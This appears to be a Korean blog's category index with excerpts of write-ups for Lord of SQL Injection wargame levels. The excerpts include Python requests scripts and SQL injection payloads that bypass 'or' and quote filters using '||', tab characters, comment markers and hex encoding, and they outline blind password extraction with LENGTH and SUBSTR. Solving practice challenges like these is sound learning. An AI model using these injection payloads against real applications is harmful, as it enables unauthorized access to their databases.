SQLInjection(17)
-
6. LOS - darkelf
LOS 6번 darkelf입니다.소스코드를 확인하면 다음과 같습니다. 이전거와 달라진점을 찾는다면 or이 ban먹었습니다.전에 알려준 두번째 방법처럼 or -> ||으로 바꾸면 필터링을 넘어가게 됩니다! 페이로드입니다 :) 1234567891011121314import requestsimport string URL = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"payload = "?pw=1'||id='admin'%23"URL += payload cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")response = requests.get(URL, cookies = cookie..
2018.08.05 -
5. LOS - wolfman
이번은 LOS 5번 wolfman입니다. 소스코드를 확인하면 id를 admin으로 만들어주면 풀 수 있게 됩니다. 페이로드는 다음과 같습니다. 12345678910111213import requestsimport string URL = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"payload = "?pw=1'or%09id='admin'%23" # "?pw=1'||id='admin'%23" 0: for i in range(1, 10) : print("WOOOOOOOOOOOOOOOOOOOOOOWsolveIT!!")cs
2018.08.05 -
4. LOS - orc
저번에 심심할때 풀었다가 orc에서 막혀서 다시 포너블에 집중하고, lob, FC3 올클하고 다시왔습니다... 방학동안 너무 놀았어서서 탈이네요 ㅠ 공부 좀더 일찍 시작할껄..ㅠ 본론으로 들어가죠 코드를 보면다음과 같습니다. password의 길이는 구하는 함수인 LENGTH를 이용하고SUBSTR함수를 이용해서 한글자씩 비교하면 좋겠군요!! 아래는 페이로드입니다 :) 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849import requestsimport string num_alpha = string.digits + string.ascii_letterspassword = "" #find lengt..
2018.08.04 -
3. LOS - GOBLIN
GOBLIN 3번째 write-up 이다.허접한글이지만 지금 보시는분들덕분에 열심히 쓰는 중입니다..goblin도 마찬가지로 소스코드부터 확인해보죠. 마찬가지로 3번도 id가 admin이면 solve가되는 구조입니다.하지만 get[no]가 2개라서 id에 값을 입력해줄 변수는 보이지 않습니다.어떤 방법으로 시도해 봐야할까요? no값을 정해준 후 id값을 다시 정해주면 될 것 같습니다. 어랏...코드를 다시 살펴보니 ' 도 막혀있네요.. 한번더 우회해서 id 에 admin을 넣어주면 잘 풀릴거같은데...흠plaintext를 16진수 hex값으로 바꾸어주면 string으로 변환되서 들어갑니다.http://freaka.freehostia.com/charset2.php 이 사이트에서 string을 16진수 he..
2018.07.15 -
2. LOS - COBOLT
LOS COBOLT 마찬가지로 2번 문제도 소스코드부터 확인해봅시다! if문에서 id가 'admin'일시 solve가 되군요. 그럼 이번에도 엄청 간단하게 풀을 수 있을 것 같습니다. id 에 'admin'을 넣고 나머지는 다 주석처리! ~~~~?id=admin%27%23 (grin)
2018.07.14